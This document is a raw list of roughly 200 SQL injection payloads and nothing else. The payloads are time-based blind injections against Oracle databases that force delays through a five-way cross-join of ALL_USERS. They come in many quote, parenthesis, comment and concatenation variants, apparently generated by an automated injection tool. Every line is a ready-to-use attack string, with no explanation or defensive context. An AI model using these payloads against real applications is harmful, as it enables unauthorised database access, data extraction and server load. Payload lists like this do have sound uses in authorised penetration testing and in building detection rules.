') AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('GQIn' LIKE 'GQIn
')) AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('kTmx' LIKE 'kTmx
'))) AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('MiuI' LIKE 'MiuI
' AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'rJjk' LIKE 'rJjk
") AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ("ZMSe"="ZMSe
")) AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (("pqYO"="pqYO
"))) AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((("GgIX"="GgIX
" AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND "xYXr"="xYXr
") AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ("UpBP" LIKE "UpBP
")) AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (("aQOv" LIKE "aQOv
"))) AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((("UEdj" LIKE "UEdj
" AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND "uKtV" LIKE "uKtV
%') AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('%'='
%')) AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('%'='
%'))) AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('%'='
%' AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND '%'='
%") AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ("%"="
%")) AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (("%"="
%"))) AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((("%"="
%" AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND "%"="
%00') AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('WeDY'='WeDY
%00')) AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('aUVK'='aUVK
%00'))) AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('NAde'='NAde
%00' AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'bHLs'='bHLs
 AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- jMet
 AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)# CEgw
') WHERE 1549=1549 AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
") WHERE 4561=4561 AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
) WHERE 2302=2302 AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
' WHERE 8950=8950 AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
" WHERE 4574=4574 AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
 WHERE 6261=6261 AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
')) AS hwif WHERE 3716=3716 AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
")) AS lslP WHERE 3107=3107 AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
)) AS skiT WHERE 2387=2387 AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
') AS KdEb WHERE 1820=1820 AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
") AS GcuC WHERE 5723=5723 AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
) AS BBgu WHERE 2412=2412 AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
'||(SELECT 'HrFg' FROM DUAL WHERE 1813=1813 AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5))||'
'||(SELECT 'tgTn' WHERE 8360=8360 AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5))||'
'+(SELECT RYil WHERE 8601=8601 AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5))+'
'+(SELECT 'VVXo' WHERE 5672=5672 AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5))+'
' IN BOOLEAN MODE) AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)#
) OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
') OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
' OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
" OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
) OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (5725=5725
)) OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((6451=6451
))) OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (((8410=8410
 OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
') OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('cscN'='cscN
')) OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('wCdS'='wCdS
'))) OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('qosX'='qosX
' OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'yYKN'='yYKN
') OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('XLDp' LIKE 'XLDp
')) OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('INuV' LIKE 'INuV
'))) OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('RHQG' LIKE 'RHQG
' OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'OoyV' LIKE 'OoyV
") OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ("NARX"="NARX
")) OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (("dKKI"="dKKI
"))) OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((("ylwI"="ylwI
" OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND "nosQ"="nosQ
") OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ("RMYy" LIKE "RMYy
")) OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (("aUQE" LIKE "aUQE
"))) OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((("NVnJ" LIKE "NVnJ
" OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND "kclc" LIKE "kclc
%') OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('%'='
%')) OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('%'='
%'))) OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('%'='
%' OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND '%'='
%") OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ("%"="
%")) OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (("%"="
%"))) OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((("%"="
%" OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND "%"="
%00') OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('UoGx'='UoGx
%00')) OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('eWud'='eWud
%00'))) OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('CSEQ'='CSEQ
%00' OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'pAdi'='pAdi
 OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- dESo
 OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)# bkYN
') WHERE 3215=3215 OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
") WHERE 9475=9475 OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
) WHERE 4929=4929 OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
' WHERE 8955=8955 OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
" WHERE 4967=4967 OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
 WHERE 2034=2034 OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
')) AS uXKi WHERE 3980=3980 OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
")) AS Cwyy WHERE 5063=5063 OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
)) AS llwK WHERE 2292=2292 OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
') AS YxUz WHERE 4850=4850 OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
") AS xpkb WHERE 6301=6301 OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
) AS wCSE WHERE 9111=9111 OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- 
'||(SELECT 'SQAP' FROM DUAL WHERE 8256=8256 OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5))||'
'||(SELECT 'IEEz' WHERE 4911=4911 OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5))||'
'+(SELECT ICNF WHERE 3876=3876 OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5))+'
'+(SELECT 'lnWn' WHERE 8096=8096 OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5))+'
' IN BOOLEAN MODE) OR 3707=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)#
) AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
') AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
' AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
" AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
)) AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
))) AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
 AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
')) AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'))) AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
") AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
")) AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
"))) AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%') AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%')) AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%'))) AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%' AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%") AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%")) AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%"))) AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%" AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%00') AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%00')) AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%00'))) AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%00' AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
') WHERE 8214=8214 AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
") WHERE 6942=6942 AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
) WHERE 9624=9624 AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
' WHERE 4235=4235 AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
" WHERE 4987=4987 AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
 WHERE 4770=4770 AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
')) AS XDGv WHERE 3235=3235 AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
")) AS cyav WHERE 6399=6399 AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
)) AS mkEX WHERE 7114=7114 AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
') AS hJCZ WHERE 8550=8550 AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
") AS mVZL WHERE 2149=2149 AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
) AS NsZP WHERE 6654=6654 AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'||(SELECT 'bJeB' FROM DUAL WHERE 1877=1877 AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'||(SELECT 'hhhS' WHERE 1130=1130 AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'+(SELECT MaYA WHERE 7323=7323 AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'+(SELECT 'rwHQ' WHERE 8878=8878 AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
' IN BOOLEAN MODE) AND 4788=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
) OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
') OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
' OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
" OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
)) OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
))) OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
 OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
')) OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'))) OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
") OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
")) OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
"))) OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%') OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%')) OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%'))) OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%' OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%") OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%")) OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%"))) OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%" OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%00') OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%00')) OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%00'))) OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%00' OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
') WHERE 3531=3531 OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
") WHERE 2652=2652 OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
) WHERE 1237=1237 OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
' WHERE 6874=6874 OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
" WHERE 7836=7836 OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
 WHERE 4982=4982 OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
')) AS Vsey WHERE 5746=5746 OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
")) AS VVSl WHERE 6582=6582 OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
)) AS ZYFu WHERE 9002=9002 OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
') AS qCDy WHERE 3964=3964 OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
") AS THon WHERE 9959=9959 OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
) AS Gupi WHERE 4619=4619 OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'||(SELECT 'SqtO' FROM DUAL WHERE 3225=3225 OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
